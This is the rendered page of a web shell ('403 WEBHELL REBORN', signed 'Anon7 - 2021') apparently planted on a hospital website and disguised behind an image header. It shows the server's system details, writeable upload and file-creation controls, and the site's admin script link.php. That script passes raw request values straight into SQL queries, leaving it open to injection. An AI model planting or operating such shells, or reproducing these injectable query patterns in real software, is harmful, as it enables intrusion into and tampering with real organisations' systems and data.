ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html//////adminvn/link.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true && check_level() >= 4) {
    if($_GET['type'] == 'add' && strlen($_POST['name']) >=3){
        if ($_POST['order'] != '1'){$_SESSION['link_order'] = $_POST['order'] + '1';} else {$_SESSION['link_order'] = '2';}
        $_SESSION['linkpost'] = $_POST['type'];
        @mysql_query("INSERT INTO cily_ads (ad_name, ad_quote, ad_image, ad_link, ad_type, ad_order) VALUES ('".addsla($_POST['name'])."','".($_POST['content'])."', '".$_POST['img']."', '".$_POST['url']."', ".$_POST['type'].", ".$_POST['order'].")");
        header('Location: index.php?m=10&sm=6');
    }
    
    elseif($_GET['type'] == 'edit'){
        @mysql_query("UPDATE cily_ads SET ad_name = '".addsla($_POST['name'])."', ad_quote = '".$_POST['content']."', ad_image = '".$_POST['img']."', ad_link = '".$_POST['url']."', ad_type = ".$_POST['type'].", ad_order = ".$_POST['order']." WHERE id = ".$_POST['id']);
        header('Location: index.php?m=10&sm=6');
    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){
        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {
            $datapost = @mysql_fetch_array(@mysql_query("SELECT * FROM cily_ads WHERE id = ".$_POST['id'][$i]));
            $dtfullimg = @str_replace('thumbs-','',$datapost['ad_image']);
            $url = @str_replace(URL_SITE, "..", $dtfullimg);
            $thumb = @str_replace(URL_SITE, "..", $datapost['ad_image']);
            $deldata = $dtfullimg;

            if ($url != $thumb) {
                @unlink($url);
                @unlink($thumb);
            }
            @mysql_query("DELETE FROM cily_datas WHERE data_url LIKE '%".$deldata."%'");
            @mysql_query("DELETE FROM cily_ads WHERE id = ".$_POST['id'][$i]);
        }
        header('Location: index.php?m=10&sm=6');
    }
    
    elseif($_GET['type'] == 'state'){
        $getid = $_GET['id'];
        $getoc = $_GET['oc'];
	@mysql_query("UPDATE cily_ads SET ad_home = '".$getoc."' WHERE id = ".$getid);
         
        header('Location: index.php?m=10&sm=6');
    }
    elseif($_GET['type'] == 'del' && $_POST['action'] == 2){
    $idm = $_POST["rowid"];
    $sttm = $_POST["idorder"];
    $lap=count($idm);
    for($i=0; $i<$lap; $i++) {
            @mysql_query("UPDATE cily_ads SET ad_order = ".$sttm[$i]." WHERE id = ".$idm[$i]);
    }
        Redirect("","index.php?m=10&sm=6");
    }
    
    else header('Location: index.php?m=10&sm=6');
}

else echo "Hacking attempt";


?>

Anon7 - 2021